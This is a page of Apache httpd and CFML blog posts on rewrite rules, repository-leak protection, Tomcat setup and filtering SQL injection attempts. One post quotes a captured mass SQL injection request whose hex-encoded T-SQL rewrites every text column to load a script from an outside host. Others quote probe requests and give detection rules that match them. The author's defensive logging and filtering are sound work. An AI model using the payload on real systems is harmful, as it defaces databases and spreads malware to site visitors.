Viewing Category: Apache  [clear category selection]

Additional thoughts on SQL injection attacks

This is a short follow-up to my post on Friday about a SQL injection attack against this blog. Since the beginning in 3 Feb 2010, I've logged 17663 attempts. This the first hit from 94.142.131.77 (Latvia Cesis Sia Css Group):

94.142.131.77 - - [03/Feb/2010:03:33:49 -0800] "GET /machblog/index.cfm?event=showEntriesByCategory&categoryId=-1'&categoryName=Tomcat HTTP/1.0" 200 19689 "-" "Mozilla/4.0 (compatible; Synapse)"

Compared that to the most recent request from 68.12.167.207 (United States Phoenix Cox Communications Inc.), showing the forwarding response:

68.12.167.207 - - [05/Aug/2013:09:51:16 -0700] "GET /machblog/index.cfm?event=showcategoryrss&categoryid=-1%27&categoryname=cygwin HTTP/1.0" 302 354 "-" "Mozilla/4.0 (compatible; Synapse)"

They didn't initially URL-escape the single-quote character. Maybe they intended to, but for whatever reason, their script failed to operate as intended. Just in case, I'll update my protection to catch both situations:

RewriteCond %{QUERY_STRING} (=-1%27|=-1') RewriteRule ^ http://www.google.com/? [R=301,L]

Since I added the parenthesis characters for the logical group match, I no loner need to escape the equals character. I guess that would have been another way to escape the equals character without using the backslash. If you felt so inclined. Also, thinking about it a moment, I might not want to forward the user agent to Google with the original query string. I can achieve that by appending a question mark to the destination URL. Finally, I probably want to use a HTTP 301 permanent redirect response, just in case Apache Synapse will do something special with that status code, like remove it from a queue. Doubtful.

A distributed SQL injection attack

My blog has been sending a few hundred exception alerts for the past couple days, which is not uncommon. Every poorly scripted crawler and buggy RSS parser sends malformed URLs that throw an exception because something isn't a proper UUID. I have become quite accustomed to ignoring all that nonsense. However, this most recent batch was different. It was a deliberate attempt to find an SQL injection flaw. For example, instead of sending /machblog/index.cfm?pageId=foo they sent /machblog/index.cfm?pageId=-1%27. And for URLs with more than one argument, they tried the premature close-quote trick for each value. It's not clear to me how they would recognize a successful exploit was executed. There is no payload following the quote character. Maybe their attack isn't fully written, or perhaps they're looking for a response that is specific to a particular application.

The more interesting thing was where the hits were coming from. Here are a sample of hits from a couple hours:

From all over the world, somebody really wanted to exploit my little blog. It was pretty easy to identify these as all being part of the same attack system because the HTTP headers sent were identical. They appear to be using the Apache Synapse project to launch and manage the URLs. To deal with it, I just created a simple Apache HTTP rewrite rule to forward them to Google:

RewriteCond %{QUERY_STRING} \=-1%27 RewriteRule ^ http://www.google.com

Note how the regex must have a leading backslash to prevent the "special variants" in the RewriteCond condition pattern from treating =-1%27 as meaning lexicographically equal to "-1%27". It's a subtle detail, but makes all the difference.

Some day, I'll upgrade my blog to NGINX + Current Tomcat + Current Railo + ContentBox from Apache + Old Tomcat + Old Open BlueDragon + MachBlog. Until then, I just need it to soldier on.

Dealing with UUID values in URLs

A few days ago, David Flinner posted a comment via Google+ about a blog post I made recently. I saw the ugly URL back to my blog and clicked on it for no particular reason. My instance of MachBlog threw an exception because the URL contained a UUID with a trailing dot. When MachBlog searched for the post matching that primary key, it came up empty. This sort of problem happens all the time, and I don't know what is so difficult for spiders to pick up the proper URL. I know I should migrate someday — especially to something that could deal with human comments — but there are other things higher up on the todo list.

At any rate, I decided to take another look at my Apache URL rewriting rules and fix the issue. Previously, I was supporting a shortcut URL like /blog/UUID, which redirects to /machblog/index.cfm?event=showEntry&entryId=UUID. I was also checking to see that incoming URLs had a proper UUID (the right number of hex values separated in the correct positions by dashes). I made a change to the rules so that trailing characters would be hacked off. Here are the new rules:

# MachBlog shortcut RewriteRule ^/blog/([-a-f0-9]{35}) /machblog/index.cfm?event=showEntry&entryId=$1 [NC,R,L] # URL decode a doubly-encoded UUID RewriteCond %{QUERY_STRING} entryId=([.]{8})%2D([.]{4})%2D([.]{4})%2D([.]{16}) [NC] RewriteRule .* /machblog/index.cfm?event=showEntry&entryId=%1-%2-%3-%4 [NE,R,L] # Truncate extra characters RewriteCond %{QUERY_STRING} entryId=([-a-f0-9]{35})[^&] [NC] RewriteRule .* /machblog/index.cfm?event=showEntry&entryId=%1 [NE,R,L]

Note that it's important to use the no-escape (NE) flag on the rewrite so that extra URL encoding isn't introduced.

Preventing SCCS Data Leaks

Many people, right or wrong, deploy CFML applications to the web server by performing a checkout a source code control system, such as Subversion or Git. This has the effect of placing repository information in directories with the rest of the files; ${APPROOT}/**/.svn and ${APPROOT}/.git, for example. It's possible that this repository information (containing the code in plain-text and configuration files) will be exposed by the web server. That would be bad.

Whether the repository data is visible to an HTTP client depends on several factors: the OS, the web server and configuration, the directory and file permissions and OS- and filesystem-specific attributes. Probably the two most common environments are Windows with IIS and Linux with Apache. In the first case, IIS by default is configured to hide files and directories with the NTFS hidden attribute. Since both Subversion and Git create their repository directories with this flag enabled, the default scenario on Windows/IIS is safe. However, the same is not true for Linux/Apache (or Apache on Windows, for that matter).

Apache has always shipped, to the best of my knowledge, with a server-wide directive to prevent disclosing .htaccess and .htpasswd files:

<FilesMatch "^\.ht"> Order allow,deny Deny from all Satisfy All </FilesMatch>

It's not enough, I'm afraid, to remove the "ht" from the regex. To properly secure the SCCS artifacts, I like to use the trusty mod_rewrite module:

RewriteRule /(\.svn|\.git)/.* - [L,F]

And while I'm on the topic of using mod_rewrite to secure an application, here are some rules I use to prevent any similar shenanigans:

RewriteRule ^/app/(config|filters|listeners|plugins|properties|views)/.* - [L,F] RewriteRule ^/(MachII|MachIIDashboard|coldspring|transfer|cfpayment)/.* - [L,F] RewriteRule ^/(db|gen|model|taglib)/.* - [L,F]

Please feel free to comment. Oh wait, I'm lame and haven't enable comments on this blog. I suppose you could send them to @jlamoree instead.

ColdFusion/JRun + Apache Commons Logging

I recently encountered a problem I'd never seen before when taking advantage of powerful Java libraries within CFML components. Since this is really specific to Adobe ColdFusion and Macromedia JRun, it won't be an issue with other configurations. Specifically, here are the details:

  • Microsoft Windows “Server” 2003 Standard Edition
  • Adobe ColdFusion 8.01 Enterprise as MultiServer
  • JavaLoader 1.0 beta
  • jXLS 0.9.9-SNAPSHOT
  • Apache POI 3.5-FINAL
  • Apache Commons BeanUtils 1.8.0
  • Apache Commons BeanUtils Collections 1.8.0
  • Apache Commons BeanUtils Core 1.8.0
  • Apache Commons Collections 3.2.1
  • Apache Commons Digester 1.8
  • Apache Commons JEXL 1.1
  • Apache Commons Logging 1.1.1

The project uses the jXLS XLSTransformer utility class to parse an Excel file and to push information into cells containing syntax like ${bean.prop}. It worked fine on my workstation, but when running on the staging servers, it threw an exception with the following message: User-specified log class 'jrunx.axis.Logging' cannot be found or is not useable.

After many hours of investigation, I tracked the problem down to the so-called discovery process that org.apache.commons.logging.LogFactory uses to provide logger implementations. It was my assumption that when using Mark Mandel's JavaLoader to create instances of classes from the JAR files added to its ClassLoader, they would be isolated from the rest of the JVM. That's not exactly how it works, even if configured not to use ColdFusion's ClassLoader as the parent. To force the LogFactory not to use jrunx.axis.Logging, I tried rebuilding the jXLS library with a commons-logging.properties file to specify which logger implementation to use; I tried adding the properties file to the lib directory. Neither solved the problem.

The solution is pretty simple. After configuring JavaLoader, and before having it instantiate the needed XLSTransformer, just set the desired logger programmatically. Here is the chunk of XML that ColdSpring uses to fill JavaLoader with all the JAR files required.

<bean id="jxlsClassPath" class="model.io.FileEnumerator"> <property name="pathList"> <value>/jxls/lib</value> </property> <property name="patternList"> <value>*.jar</value> </property> </bean> <bean id="jxlsFactory" class="jxls.Factory"> <property name="javaloader"> <bean class="javaloader.JavaLoader"> <constructor-arg name="loadPaths"> <bean factory-bean="jxlsClassPath" factory-method="getFileArray"/> </constructor-arg> </bean> </property> </bean>

The code inside the CFC that does the work of creating the XLSTransformer then explicitly sets the logger:

<cfscript> var javaLoader = getJavaLoader(); var logFactory = "null"; var transformer = createObject("component", "jxls.Transformer").init(); logFactory = javaLoader.create("org.apache.commons.logging.LogFactory").getFactory(); logFactory.setAttribute("org.apache.commons.logging.LogFactory", "org.apache.commons.logging.impl.LogFactoryImpl"); logFactory.setAttribute("org.apache.commons.logging.Log", "org.apache.commons.logging.impl.NoOpLog"); transformer.setXLSTransformer(getJavaLoader().create("net.sf.jxls.transformer.XLSTransformer")); return transformer; </cfscript>

There was much celebration when this worked, I assure you.

Sending Files: mod_xsendfile vs. CFCONTENT

There is a blog post and comment thread on Ben Nadel's site about File Downloads Without Using CFContent that Sami Hoda alerted me to. Specifically, he pointed to comments about mod_xsendfile, an Apache module that serves files by scanning the output for a special HTTP header. This is really awesome in a CFML/JEE environment because the application server is freed up from waiting for a file to finish transfering.

I did some experimentation with mod_xsendfile v0.11 on Windows XP (yes, you read that correctly, on Windows) using Apache 2.2. It works beautifully. Here's an example of the web server configuration:

LoadModule xsendfile_module modules/mod_xsendfile-0.11.so <VirtualHost *:80> ServerName downloads DocumentRoot "C:/workspace/Download" XSendFile on XSendFileIgnoreEtag on XSendFileIgnoreLastModified on XSendFilePath "C:/Documents and Settings/jlamoree/My Documents/Downloads" <Directory "C:/workspace/Download"> AllowOverride all Order allow,deny Allow from all </Directory> </VirtualHost>

The experimental CFML reads a directory of files and displays a list of links, one for a download using mod_xsendfile, and another to download a file using cfcontent. The meat of the code is pasted below, but you can download the entire experiment as mod_xsendfile-experiment.zip.

<cfheader name="Content-Disposition" value="attachment; filename=""#url.filename#""" /> <cfif url.method eq "mod_xsendfile"> <cfheader name="Content-Type" value="application/octet-stream" /> <cfheader name="X-Sendfile" value="#local.filename#" /> <cfelseif url.method eq "cfcontent"> <cfcontent file="#local.filename#" reset="yes" deletefile="no" type="application/octet-stream" /> </cfif> <cfabort />

I created a quick and dirty JMeter test to compare both methods of sending a 8 Mb file. The first request using mod_xsendfile took 327 ms. The second request, only 99 ms. Using cfcontent the request times were 205 ms and 183 ms. So, take that with a grain of salt. In fact, use a whole salt shaker.

Configuring a Production Open BlueDragon Server

I've just finished building up a couple production servers to host web applications. The servers are Xen guests on an AMD Quad-Core Opteron x86_64 host. The VPS template is a minimal installation of CentOS, to which I added packages as needed. The release of Sun Java 1.6u12 came out just as I was writing this, so these instructions will need to get updated slightly when JPackage has a new RPM (more on that later). Both Matt Woodward and Dave Shuck recently wrote about configuring CFML engines with Tomcat. The installation I'll describe is somewhat similar.

  • CentOS 5.2
  • Tomcat 5.5.23 (tomcat5-5.5.23-0jpp.7.el5_2.1)
  • Apache 2.2 (httpd-2.2.3-11.el5_2.centos.4)
  • Sun Java 1.6u11 (java-1.6.0-sun-1.6.0.11-1jpp)
  • Sun JavaMail 1.4.1
  • Open BlueDragon 1.0.1

The installation of packages using yum is a snap, however there was an issue with the architecture detection. There is a simple workaround, to hard-code i386 as the basearch:

sed -i -r 's/\$basearch/i386/g' /etc/yum.repos.d/CentOS-Base.repo

The procedure is to install jpackage-utils, then download and repackage the Sun Java SE Development Kit 6 (jdk 1.6) using the JPackage Project non-free nosrc RPM. I install some, but not all of the, resulting RPMs:

yum --nogpgcheck localinstall java-1.6.0-sun-1.6.0.11-1jpp.i586.rpm java-1.6.0-sun-devel-* java-1.6.0-sun-fonts-*

The CentOS Wiki has a thorough article on installing Java on CentOS. I've considered using OpenJDK, but I don't know what sort of compatibility issues that would raise.

The Tomcat server starts up just fine with GNU's version of the Java runtime (libgcj and java-1.4.2-gcj-compat). However, using the GNU version of JavaMail (classpathx-mail) instead of Sun JavaMail, the following chunk of CFML will fail with a javax.mail.NoSuchProviderException exception from within the Open BlueDragon web application:

<cfscript> server = "localhost"; port = 25; username = ""; password = ""; mailSession = createObject("java", "javax.mail.Session").getDefaultInstance(createObject("java", "java.util.Properties").init()); transport = mailSession.getTransport("smtp"); transport.connect(server, JavaCast("int", port), username, password); transport.close(); </cfscript>

Open BlueDragon does include include the correct Jar, but the JVM that Tomcat configures loads the system version first. Rather that muck about with the classpaths, I downloaded the current version of JavaMail, extracted mail.jar, and created alternatives link:

unzip -j -d /tmp javamail-1_4_1.zip javamail-1.4.1/mail.jar mv /tmp/mail.jar /usr/share/java/javamail-1.4.1.jar alternatives --install /usr/share/java/javamail.jar javamail /usr/share/java/javamail-1.4.1.jar 5000 alternatives --auto javamail file /var/lib/tomcat5/common/lib/\[javamail\].jar

Tomcat installs a set of symlinks to /usr/share/tomcat5. Configuration files are placed in /etc/tomcat5. For this installation, I use a stripped-down version of server.xml that provides web application hosting on a per-user basis.

<Server port="8005" shutdown="SHUTDOWN"> <GlobalNamingResources /> <Service name="Catalina"> <Connector port="8080" address="127.0.0.1" protocol="HTTP/1.1" /> <Connector port="8009" address="127.0.0.1" protocol="AJP/1.3" /> <Engine name="Catalina" defaultHost="localhost"> <Host name="localhost" appBase="webapps" unpackWARs="true" autoDeploy="true" debug="0" /> <Host name="localhost-username" appBase="/home/username/webapps" unpackWARs="false" autoDeploy="false" debug="1"> <Context path="" docBase="openbd" allowLinking="true" caseSensitive="true" swallowOutput="true" /> </Host> </Engine> </Service> </Server>

The standard Tomcat configuration has a single Host within an Engine named Catalina. I've added a second Host that is specific to a system user username, which allows each user on the system to manage their own deployed web applications and choose their own root Context. Installing Open BlueDragon as the default web application simplifies the Apache HTTP configuration.

The username user has an Apache HTTP configuration file in /etc/httpd/conf.d/username.conf with mod_rewrite rules to proxy all requests for CFML files to the Tomcat HTTP Connector. I had intended to use the AJP Connector with mod_proxy_ajp, but there is a problem with the the proxy request not specifying the proper hostname. There might be a solution to that issue, but I haven't found it yet. The plain mod_proxy_http module works properly in the following configuration:

<VirtualHost *:80> DocumentRoot /home/username/websites/sitename ... RewriteCond %{SCRIPT_FILENAME} \.cfm$ RewriteRule ^/(.*)$ http://localhost-username:8080/$1 [P] </VirtualHost>

The rest of the Apache HTTP configuration handles web requests for flat files, served from ~/websites/sitename. The CFML files can be placed in ~/webapps/openbd, however an easier deployment is to place everything in ~/websites/sitename (like you would with a typical ColdFusion server). Symbolic links can be added for directories containing CFML. Consider the following:

cd ~/webapps/openbd ln -s ../../websites/sitename/MachII MachII

It would probably be a good idea to set the Open BlueDragon root mapping appropriately. There are a few issues with file ownership and permissions that I didn't address above. I've added username to the /etc/sudoers file, granting that user limited access.

Quick and Dirty Configuration FIle Security

I follow the convention that XML configuration files for Mach-II, ColdSpring, and Transfer ORM go in the $WEBROOT/$APPROOT/config directory. This directory is web accessible, and unless otherwise protected, would leak information that could be compromising. There are many ways to secure this information, but a quick and dirty way to do it is add a .htaccess file to the source tree:

# /home/www/sites/example.com/app/config/.htaccess Order by allow,deny Deny from all

Of course, this will only work if Apache is configured with the default AccessFileName directive and the config directory is beneath a path with AllowOverride specifying (at least) Limit. For example:

# /etc/httpd/conf.d/example.com.conf <Directory /home/www/sites/example.com> AllowOverride Limit </Directory>

Another method that I use on sites with large sets of URL rewrite rules, is creating a rule to forbid access to matching URLs. For example:

# /etc/httpd/conf.d/example.com.conf RewriteRule ^/app/config/.* / [L,F]

The rewrite has the same effect, but doesn't require the .htaccess file or AllowOverride directive.

MSNBot Madness

The MSN search engine (AKA Live Search, apparently) uses the MSNBot to crawl websites for content. For whatever reason, I see that it unnecessarily percent encodes values in the query string, causing the dash character used in the GUID to be represented with %2D instead of -. Even worse, I see it making the same request again using a double encoding on the separator character in the GUID: %252D. When MachBlog uses the value from the URL to query the correct blog post, it encounters an error because the parameter isn't a standard 35 character GUID.

I don't see any other spiders making this error. However, I suspect what happened is that the MSNBot parsed the XML RSS feed like a normal HTML page, and added all the /rss/channel/item/link text nodes to the URL parse stack. MachBlog uses the URLEncodedFormat function when building the URL. This may have been changed in newer versions of MachBlog -- I didn't check. A fairly simple fix would be to check the format of URL.entryId before using it in a query.

I decided to attack the problem at the web server instead. Some mod_rewrite rules match the pattern of a percent encoded GUID and break it into groups. The subsequent rule uses the groups to build a redirection.

RewriteCond %{QUERY_STRING} entryId=([\w]{8})%2D([\w]{4})%2D([\w]{4})%2D([\w]{16}) [NC] RewriteRule .* /machblog/index.cfm?event=showEntry&entryId=%1-%2-%3-%4 [NE,R,L]

What if the event was something other than "showEntry"? Well, assuming that the cause of this whole problem is that the XML RSS feed is being parse as an HTML page, that's the only event specified.

Ignoring SQL Injection Attacks

Over the past few months, I've seen an increase in SQL injection attacks on my web applications. This clutters up the web log with long URLs containing an encoded TSQL statement that will modify the content of a Microsoft SQL Server database. It also causes my application to throw an exception (the designed behavior) and send an e-mail about the problem. The following is an example of the request that a script kiddie would craft:

GET /page.cfm?var1=val1&var2=val2';DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445 434C415245204054207661726368617228323535292C40432076617263686172283430303029204445434C4152 45205461626C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E616D 652066726F6D207379736F626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D62 2E696420616E6420612E78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970 653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50454E205461626C 655F437572736F72204645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040 542C4043205748494C4528404046455443485F5354415455533D302920424547494E2065786563282775706461 7465205B272B40542B275D20736574205B272B40432B275D3D2727223E3C2F7469746C653E3C73637269707420 7372633D22687474703A2F2F777777322E73383030716E2E636E2F63737273732F772E6A73223E3C2F73637269 70743E3C212D2D27272B5B272B40432B275D20776865726520272B40432B27206E6F74206C696B652027272522 3E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777322E73383030716E2E636E2F63 737273732F772E6A73223E3C2F7363726970743E3C212D2D272727294645544348204E4558542046524F4D2020 5461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F 72204445414C4C4F43415445205461626C655F437572736F72%20AS%20CHAR(4000));EXEC(@S); HTTP/1.1

Line breaks have been inserted to make it fit within the page boundaries. You can use a tool such as the JavaScript ASCII Converter to see what is encoded within the hex character string.

To prevent this junk from being acknowledged by my web server, I've used a bit of mod_rewrite magic.

RewriteCond %{REQUEST_METHOD} GET RewriteCond %{QUERY_STRING} DECLARE RewriteRule .* http://127.0.0.1/ [E=ScriptKiddies:1,R,L] CustomLog log/access_log combined env=!ScriptKiddies

I check that the request method is GET because POST requests are handled differently. Also, the form fields of a POST aren't recorded in the Apache web log. The test for the literal string DECLARE is all that is needed to spot a bogus requests. If there comes a time in the future that a valid request is falsely identified, I can adjust the regular expression to be more explicit. The script kiddies' HTTP client is sent a HTTP/1.1 302 Found response, which it probably ignores. Finally, the request is eliminated from being written into the logs.

Apache and Environment Variables

Here's another Apache tip. The scenario is that there are multiple real web servers behind a load balancer. When a client browser makes a request, it's not apparent which real server created the response. In the past, I have added HTTP headers to the response containing the hostname of the real server. The problem is that if the configuration files differ on each real server, it's difficult to keep them in sync. Sure, I could maintain templates containing tokens that are replaced during distribution, but there's an easier solution.

Consider two configuration files, one on server01; the other on server02:

# /etc/http/conf.d/site.conf Header set X-Hostname server01 # /etc/http/conf.d/site.conf Header set X-Hostname server02

Because the files differ, care must be taken when changing either files. The solution is to make the header value dynamic so the same file works on both servers:

# /etc/http/conf.d/site.conf PassEnv HOSTNAME Header set X-Hostname "%{HOSTNAME}e"

You'd think this would work a treat, but it doesn't because Apache's environment does not contain HOSTNAME. I believe the simplest solution is to modify the file that gets included when /etc/init.d/httpd is used to start/stop the service. Just one line needs to be added to the /etc/sysconfig/httpd file:

export HOSTNAME=`hostname`

To make this change easy, and less error-prone, I wrote a little script to do the job:

#!/bin/sh CFGFILE=/etc/sysconfig/httpd if `grep HOSTNAME $CFGFILE`; then echo "Error: Looks like $CFGFILE is already patched." exit 1 fi cat >> $CFGFILE <<'EOF' # Export server's hostname for use in HTTP headers # to identify a real server in the cluster. export HOSTNAME=`hostname` EOF echo "Done!"

There you have it. Once the httpd daemon is restarted, it will pick up the HOSTNAME environment variable, and send the right HTTP header.

Saying hello to Nagios

While setting up the VPS that hosts this site, I noticed that the Nagios tests of the HTTP service were being forwarded and logged like a normal client. That's two log lines every 15 seconds -- one for the request of /, then another for the relocated document /machblog/index.cfm. I wanted to change the way that Apache responds to service checks in two ways:

  • Do not log the requests made by the service checking program
  • Do not forward the service checking program

This is quite easy with a sprinkle of Apache module voodoo. Using mod_setenvif, the server can test the User Agent to detect the Nagios plugin client. The result of the test is passed to mod_log_config so the hit isn't written to the log; then it's used by mod_rewrite to bypass the redirection. The directives are placed into /etc/httpd/conf.d/_default_virtualhost.conf, which is read first by Apache during startup because it processes included files alphabetically. It's important to apply the logic to the default (first) virtual host because the service check program makes a plain HTTP/1.0 request by IP address.

<VirtualHost *:80> SetEnvIfNoCase User-Agent nagios ServiceCheck CustomLog logs/access_log combined env=!ServiceCheck RewriteCond %{ENV:ServiceCheck} !1 RewriteRule .* http://www.lamoree.com/ [R,L] </VirtualHost>

There are a few different ways I could have achieved the same result, but I think this is the most efficient because the User Agent string is only tested once. I can also (and do) add more rules to thwart bots, worms, and script kiddies.

A couple great tools

I've been doing quite a bit of data shuffling lately in my project to migrate corporate e-mail services from an older server to a new architecture using Postfix, Dovecot, and OpenLDAP. I was inspired by Jamm, which I have used with good results at other installations. However, the administration interface didn't really address all my requirements, so I wrote my own. More on that later.

Anyway, this all leads up to my praise for a couple of products that have made life much more, um, livable. They are <oXygen/> XML Editor and Apache Directory Studio, formerly called LDAP Studio.

I've used this product for several years, and it's gotten orders of magnitude better since then. That's not to say that it wasn't a solid product when I started using it, rather, it has become an amazing suite of XML tools since then. Case in point: when I needed to import a whole bunch of e-mail forwarding aliases, I use the text import tool to build an XML file that I could then parse with my own program. I had never tried this feature before, but without even glancing at the manual I was able to complete the task in minutes.

Another thing that SyncRO soft (in ROmania, get it?) should get a whole lot of praise for is releasing a multi-platform Java application that feels like a native Mac OS X application. Many companies that create cross-platform Java applications have completely broken user interfaces when used with the Java Look and Feel library for Mac OS X (Aqua LAF). For example, Gentleware's Poseidon for UML is horrendous, which is a shame because it's an otherwise very good UML tool.

Oxygen XML Editor is distributed as a traditional tarball (.tar.gz) that is simply unarchived and executed. That's it -- no installer like Macrovision InstallAnywhere, which sucks really hard, by the way. The only installation to speak of is to paste in a license key upon the first launch. Simple. If I could make one suggestion, it would be to follow Apple's installer guidelines by distributing the software in a compressed Disk Image.

I have one final comment about Oxygen XML Editor: price. I use the Enterprise Edition, which is currently US$ 275. At first I thought that was too expensive, but after trying some of the offerings from other vendors, I came to the conclusion that it's a bargain. I don't hesitate recommending it to anyone.

I've only used Apache Directory Studio for a short while. Before that, I was using ldapsearch, ldapadd, and ldapmodify on the command line. While I was setting up the system, the CLI tools were necessary to aide in debugging a few problems. However, now that most of the problems are ironed out, I can switch to a GUI. Apache Directory Studio is an Eclipse RCP application, which is great because I'm very comfortable in Eclipse. I spend most of my day in CFEclipse.

Okay, that's enough gushing for now. Back on your heads.